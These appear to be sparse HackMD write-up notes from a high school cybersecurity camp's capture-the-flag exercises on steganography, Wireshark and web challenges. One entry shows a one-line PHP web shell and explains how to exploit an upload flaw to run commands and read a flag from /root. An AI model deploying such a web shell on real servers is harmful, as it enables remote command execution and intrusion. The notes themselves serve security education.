# 永平高中 資安守門員-隱寫術 & Wireshark營隊 Write-ups # stegs ## So Meta Meta Data  ## St3g0 https://georgeom.net/StegOnline/upload   ## Matryoshka doll    # web & wireshark ## Packets Primer  ## Wireshark doo dooo do doo... ``` tcp.stream eq n ```   小陷阱,我們ROT時不包含數字 ## dont-use-client-side  ## Some Assembly Required 1  ## PcapPoisoning  ## n0s4n1ty 1 這題主要是上傳漏洞,攻擊者可以上傳一句話木馬的php檔案 ``` <?php system($_GET['cmd']); ?> ``` 上傳後找到位置,再透過網址列執行指令即可操作受害電腦 先找到flag的位置,題目說再/root資料夾裡,便使用```ls ..```找尋資料夾位置,再把flag```cat```出來    ## includes   ## Insp3ct0r    ## Inspect HTML  ## Search source  # others ## HideToSee   ## hideme  
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up